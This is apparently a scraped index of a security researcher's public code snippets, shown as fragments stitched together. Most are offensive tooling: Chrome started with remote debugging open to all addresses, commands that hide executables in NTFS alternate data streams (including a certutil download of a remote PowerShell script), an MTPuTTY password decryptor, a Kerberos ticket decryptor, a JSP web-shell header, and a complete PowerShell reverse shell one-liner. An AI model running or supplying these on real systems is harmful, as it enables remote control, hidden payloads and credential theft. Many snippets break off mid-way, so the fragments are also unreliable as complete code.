tothi

Target

Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

--remote-debugging-port=9222

--remote-debugging-address=0.0.0.0

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Docker compose as a systemd unit

Create file /etc/systemd/system/[email protected]. SystemD calling binaries using an absolute path. In my case is prefixed by /usr/local/bin, you should use paths specific for your environment.

[Unit]
Description=%i service with docker compose
PartOf=docker.service
After=docker.service


	<#
	.Synopsis
	Decrypt an MTPuTTY configuration file

	.Description
	Read an MTPuTTY configuration file, decrypt the passwords and dump the result

	.Parameter ConfigFile
	Path to the MTPuTTY configuration file

	#!/usr/bin/env python2
	# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
	# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
	#
	# Recommended Instructions:
	# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
	# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
	# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
	# Run this script to decrypt:
	# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]

	using System;
	using System.Text;
	using System.IO;
	using System.Diagnostics;
	using System.ComponentModel;
	using System.Linq;
	using System.Net;
	using System.Net.Sockets;

	WEB
	1
	https://ringzer0team.com/IQY

	Selection=EntirePage
	Formatting=RTF
	PreFormattedTextToColumns=True
	ConsecutiveDelimitersAsOne=True
	SingleBlockTextImport=False
	DisableDateRecognition=False

	<%--
	jsp File browser 1.2.1

	nikallass added OS check, so shell can be executed on Windows and Linux without modifying now.

	Copyright (C) 2003-2006 Boris von Loesch
	This program is free software; you can redistribute it and/or modify it under
	the terms of the GNU General Public License as published by the
	Free Software Foundation; either version 2 of the License, or (at your option)
	any later version.

	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

	#!/usr/bin/env python
	#
	# Title: lookupadmins.py
	# Author: @ropnop
	# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
	# Similar in function to Get-NetLocalGroup from Powerview
	# Won't work against Windows 10 Anniversary Edition unless you already have local admin
	# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
	#
	# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket